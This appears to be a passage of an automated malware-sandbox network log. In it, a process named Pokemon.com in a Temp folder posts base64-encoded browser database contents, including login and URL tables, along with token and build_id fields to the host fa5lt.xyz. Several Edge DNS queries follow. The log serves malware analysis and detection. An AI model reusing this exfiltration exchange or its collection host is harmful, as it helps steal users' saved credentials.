                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:19 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                    Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:20 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    18192.168.2.549899116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----P89R1VSJEKFUAIWTJE3O
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 68733
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 50 38 39 52 31 56 53 4a 45 4b 46 55 41 49 57 54 4a 45 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 50 38 39 52 31 56 53 4a 45 4b 46 55 41 49 57 54 4a 45 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 50 38 39 52 31 56 53 4a 45 4b 46 55 41 49 57 54 4a 45 33 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------P89R1VSJEKFUAIWTJE3OContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------P89R1VSJEKFUAIWTJE3OContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------P89R1VSJEKFUAIWTJE3OCont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                    Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                    Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:21 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    19192.168.2.549908172.64.41.34434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:20 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f89c30cdf8e4399-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f1 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcomPc)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    20192.168.2.549909172.64.41.34434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:20 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f89c30ced5b5e86-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 23 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom#Pc)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    21192.168.2.549907172.64.41.34434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:20 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f89c30d3d24de98-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 06 00 04 8e fa 40 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom@C)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    22192.168.2.549900142.250.181.654434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:20 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Content-Length: 154477
